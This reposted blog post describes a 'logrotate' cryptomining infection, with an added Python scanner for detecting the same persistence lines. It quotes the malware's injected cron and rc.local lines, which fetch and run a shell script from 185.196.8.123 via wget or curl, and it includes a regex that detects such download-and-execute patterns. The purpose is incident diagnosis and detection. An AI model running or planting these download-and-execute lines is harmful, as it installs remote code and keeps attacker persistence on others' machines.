[Solved] Cryptomining malware "logrotate" from 185.196.8.123

news/2024/11/20 14:31:13/Source: https://www.cnblogs.com/aligege/p/18289685

If you have recently been hit by this malware, this article is for you.

I found several similar articles online, and all of them tell you to kill the process and delete the files. But the newer version of the malware has evolved: kill the process and it comes back to life, delete the file and it reappears...

After several days of trying, I finally found a way to get rid of it.


First, check whether your symptoms match mine.

Symptoms: shell login is slow, a process named logrotate uses a lot of CPU, and that process's executable is at /root/.config/logrotate; delete it and it is regenerated.


Running find /etc | xargs grep -ri "185.196.8.123" showed that roughly the following files had the malicious line injected (the same line appears several times in each file, because the malware keeps appending it):

Scheduled tasks at every level, plus scripts executed at system login and logout:

/etc/cron.daily/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/rc.d/rc.local:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) >/dev/null 2>&1
/etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.weekly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/cron.monthly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/crontab:@daily source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/crontab~:@daily source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/crontaz~:@daily source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
/etc/rc.local:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) >/dev/null 2>&1
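As an added example (mine, not from the article), here is a small Python scanner for the persistence pattern shown above: it walks the cron and rc.local locations the grep turned up, plus editor backups such as crontab~, and flags every line that sources or pipes a wget/curl download into a shell, counting how many times the line was appended to each file. The path list, the regex, and the sample file contents are my assumptions and a constructed sample; the `. <(curl ...)` and `curl ... | sh` forms go beyond the exact line on this page. It only reports, it removes nothing.

```python
import re
from pathlib import Path

# Locations where the article's grep found the injected line (assumed layout of your host).
PERSISTENCE_PATHS = ["/etc/crontab", "/etc/cron.d", "/etc/cron.hourly", "/etc/cron.daily",
                     "/etc/cron.weekly", "/etc/cron.monthly", "/etc/rc.local", "/etc/rc.d/rc.local"]

# A line that fetches a remote script and runs it in the current shell, as in the article:
#   source <(wget -q -O - http://HOST/x.sh || curl -sL http://HOST/x.sh)
# The `. <(curl ...)` and `curl ... | sh` forms are covered too (my generalisation).
REMOTE_EXEC = re.compile(
    r"(?:\bsource\b|(?<!\S)\.)\s+<\(\s*(?:wget|curl)\b.*?(https?://[^\s)|]+)"
    r"|\b(?:wget|curl)\b[^|\n]*?(https?://[^\s)|]+)[^|\n]*\|\s*(?:ba)?sh\b")

def scan_text(text):
    """Return {remote_url: line_count} for remote-exec lines in one file's contents."""
    hits = {}
    for line in text.splitlines():
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue  # blanks and comments are never executed
        m = REMOTE_EXEC.search(stripped)
        if m:
            url = m.group(1) or m.group(2)
            hits[url] = hits.get(url, 0) + 1  # the malware re-appends the line on every run
    return hits

def scan_paths(paths=PERSISTENCE_PATHS):
    """Scan each path (recursing into directories) plus editor backups such as crontab~."""
    report = {}
    for base in map(Path, paths):
        for p in [base] + list(base.parent.glob(base.name + "~")):
            files = [f for f in p.rglob("*") if f.is_file()] if p.is_dir() else [p]
            for f in files:
                try:
                    hits = scan_text(f.read_text(errors="replace"))
                except OSError:
                    continue  # missing or unreadable: nothing to report
                if hits:
                    report[str(f)] = hits
    return report

# Constructed sample mirroring the article's /etc/cron.hourly/logrotate (not a real file).
SAMPLE_CRON_HOURLY = "\n".join(["#!/bin/sh", "/usr/sbin/logrotate /etc/logrotate.conf"] + [
    "source <(wget -q -O - http://185.196.8.123/logservice.sh || "
    "curl -sL http://185.196.8.123/logservice.sh)"] * 3)

if __name__ == "__main__":
    print(scan_text(SAMPLE_CRON_HOURLY))  # {'http://185.196.8.123/logservice.sh': 3}
    print(scan_paths())  # findings on this host, {} when clean
```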


Approach to the fix:

The normal cleanup approach cannot remove it; I used an unconventional trick to clean it up successfully. To stop whoever wrote this malware script from seeing this article and upgrading their script, I am not publishing the approach. If you need it, leave a comment and I will send it to you for free.

Cause of infection: my guess is that you most likely had port 8000 open 😄


This article was submitted by an internet user; the views expressed are the author's own and do not represent this site's position. This site only provides information storage space, holds no ownership and bears no legal liability. If reposting, please cite the source: http://www.hqwc.cn/news/740494.html
